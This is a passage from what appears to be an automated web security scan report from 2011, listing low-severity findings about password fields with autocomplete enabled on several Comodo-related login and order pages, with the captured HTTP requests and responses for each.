<div id="login_box" style="z-index:99 ;">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
<input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.27. http://www.contentverification.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET / HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:48 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Brand
...[SNIP]...
<div id="loginb" style="top: 5px;right:5px;">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onSubmit="return
submitLoginForm(this.loginName, this.loginPassword)">

Account Login <input name="loginName" id="loginName" size="10" type="text" />
<input size="10" onFocus="this.select()" name="loginPassword" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.28. http://www.contentverification.com/confidence_pak-buy.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/confidence_pak-buy.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!placeOrder

The form contains the following password field with autocomplete enabled:

loginPassword

Request

Response

7.29. http://www.contentverification.com/logos/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.contentverification.com
Path:	/logos/index.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!placeOrder

The form contains the following password field with autocomplete enabled:

loginPassword

Request

Response

7.30. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.enterprisessl.com
Path:	/ssl-certificate-products/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.net/products/!PlaceOrder

The form contains the following password fields with autocomplete enabled:

loginPassword
verifyPassword

Request

GET /ssl-certificate-products/addsupport/ssl-purchase.html?items=price_retail_comodoevssl_2yr&x=12&y=3 HTTP/1.1
Host: www.enterprisessl.com
Proxy-Connection: keep-alive
Referer: http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-evssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.enterprisessl.com/; __utma=1.33002135.1316365450.1316365450.1316365450.1; __utmb=1.1.10.1316365450; __utmc=1; __utmz=1.1316365450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:03:09 GMT
Content-Type: text/html
Last-Modified: Fri, 02 Sep 2011 05:12:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 89573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Digital SSL Certi
...[SNIP]...
<div class="productcontainer" >

       <form onSubmit="return validate( );" name="evssl" id="evssl" method="post" action="https://secure.comodo.net/products/!PlaceOrder">
               <input name="contractSignerName" type="hidden" id="contractSignerName" value="" />
...[SNIP]...
<td align="left" valign="top"><input name="loginPassword" type="password" id="loginPassword" value="" size="48" />  </td>
...[SNIP]...
<td align="left" valign="top"><input name="verifyPassword" type="password" id="verifyPassword" value="" size="48" /></td>
...[SNIP]...

7.31. https://www.enterprisessl.com/login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.enterprisessl.com
Path:	/login.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /login.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:25 GMT
Content-Type: text/html
Content-Length: 6518
Last-Modified: Mon, 17 Jan 2011 23:35:17 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>EnterpriseSSL.com
...[SNIP]...
<div id="secuerlogin" style="width:780px; height:145px; background-color:#F1F1F1; margin-top:20px; ">
   <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
       <table border="0" cellspacing="0" cellpadding="0" align="center" style="margin:auto;">
...[SNIP]...
<td align="left" valign="middle" class="secure-login">
                           <input size="10" onfocus="this.select()" name="loginPassword" id="loginPassword" type="password" />
                           <input value="US" type="hidden" />
...[SNIP]...

7.32. https://www.hackerguardian.com/login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.hackerguardian.com
Path:	/login.html

Issue detail

The page contains a form with the following action URL:

https://www.hackerguardian.com/sas/j_spring_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /login.html HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: http://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; __utmx=212060173.; __utmxx=212060173.; ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.hackerguardian.com/; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:54:14 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3472
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optim
...[SNIP]...
</p>
<form name="loginForm" method="post" action="https://www.hackerguardian.com/sas/j_spring_security_check" onsubmit="return check_login()" style="padding:0px;margin:0px;display:inline;">
<table border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
<td align="left" valign="top"><input type="password" name="j_password" id="pass" value="" />  </td>
...[SNIP]...

7.33. https://www.hackerguardian.com/sas/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.hackerguardian.com
Path:	/sas/login.jsp

Issue detail

The page contains a form with the following action URL:

https://www.hackerguardian.com/sas/j_spring_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /sas/login.jsp?login_error=1 HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2A3716140579B8BF0E1C67C566A441BE; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; __utmx=212060173.; __utmxx=212060173.; ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.hackerguardian.com/; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:54:25 GMT
Server: Apache
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 18594

<!DOCTYPE HTML>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
Hacker Guardian
</title>

...[SNIP]...


<form id="j_spring_security_check" name="userLoginForm" onsubmit="return true;" action="j_spring_security_check" method="post">

<table width="760" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<div id="wwctrl_j_spring_security_check_j_password" class="wwctrl">
<input type="password" name="j_password" size="22" id="j_spring_security_check_j_password" style="width: 150px;text-align:left"/></div>
...[SNIP]...

7.34. https://www.instantssl.com/login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.instantssl.com
Path:	/login.html

Issue detail

The page contains a form with the following action URL:

https://secure.instantssl.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /login.html HTTP/1.1
Host: www.instantssl.com
Connection: keep-alive
Referer: http://www.instantssl.com/ssl-certificate-products/free-ssl-certificate.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/ssl-certificates/free-ssl-cert.php; entryURL=http%3A//www.instantssl.com/ssl-certificate-products/free-ssl-certificate.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:12:49 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 14114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimi
...[SNIP]...
<div id="loginform" style="overflow:hidden; ">
   <form name="loginForm" method="post" action="https://secure.instantssl.com/products/!hostedLogin" onSubmit="return submitLoginForm(this.loginName, this.loginPassword)" style="padding:0px;margin:0px;display:inline;">
   <p style="width:150px; float:left; font-size:12px; color:#666666; padding-right:5px;">
...[SNIP]...
<input type="hidden" name="region" />
           <input name="loginPassword" class="password" type="password" style="width:150px; height:17px;" value="" onClick="this.value='';" />
   </p>
...[SNIP]...

7.35. https://www.j2.com/jconnect/twa/page/homePage previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.j2.com
Path:	/jconnect/twa/page/homePage

Issue detail

The page contains a form with the following action URL:

https://www.j2.com/jconnect/twa/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /jconnect/twa/page/homePage HTTP/1.1
Host: www.j2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:00 GMT
Server: Apache
X-TWAInstance: WPA5J1
X-Powered-By: Servlet/2.5 JSP/2.1
X-TWA-Web: pb:27022
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link type="image/icon" href="/jconnect/resources/jconnect2/en2/ima
...[SNIP]...
</div><form method="POST" action="/jconnect/twa/login"><div style="width:166px;">
...[SNIP]...
<td><input class="textInput" maxlength="14" size="5" name="password" type="password"/></td>
...[SNIP]...

7.36. https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doGetLocationManagement

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/MerController/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /PCICS/MerController/doGetLocationManagement HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4a271271e63e8096a1c0ea2124e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:11 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.37. https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doGetLocationManagement

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/MerController/doLocationManagement

The form contains the following password field with autocomplete enabled:

userPassword

Request

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:30:26 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 8694

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
<br />
<form name="locationManager" action="/PCICS/MerController/doLocationManagement" method="post" onsubmit="return confirmLocationManagerFormSubmission();">
<input type="hidden" name="isCopySAQAnswers" value="No" />
...[SNIP]...
<td><input type="password" name="userPassword" value="" size="32" /></td>
...[SNIP]...

7.38. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doMetaQuestion

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/MerController/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:30:38 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.39. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doMetaQuestions

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/MerController/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /PCICS/MerController/doMetaQuestions HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart98387ea42c7965f4e9e68c9f?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:45 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.40. https://www.panopticsecurity.com/PCICS/MerController/doReviewMeta previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doReviewMeta

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/MerController/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

POST /PCICS/MerController/doReviewMeta HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers?partner=Comodo
Content-Length: 60
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&answersFine=No+Changes+%28take+me+to+SAQ+D%29

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:32:25 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.41. https://www.panopticsecurity.com/PCICS/MerController/doStart previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doStart

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/MerController/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /PCICS/MerController/doStart?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4a271271e63e8096a1c0ea2124e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:15 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.42. https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doUpdateFundamentalAnswers

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/MerController/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /PCICS/MerController/doUpdateFundamentalAnswers?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:32:14 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.43. https://www.panopticsecurity.com/PCICS/PanController/doInitUser previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doInitUser

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/PanController/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:32 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.44. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The page contains a form with the following action URL:

https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo

The form contains the following password fields with autocomplete enabled:

passwordValue
passwordValueConfirm

Request

GET /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.panopticsecurity.com/Comodo/index.jsp?partner=Comodo
Accept-Language: en-US
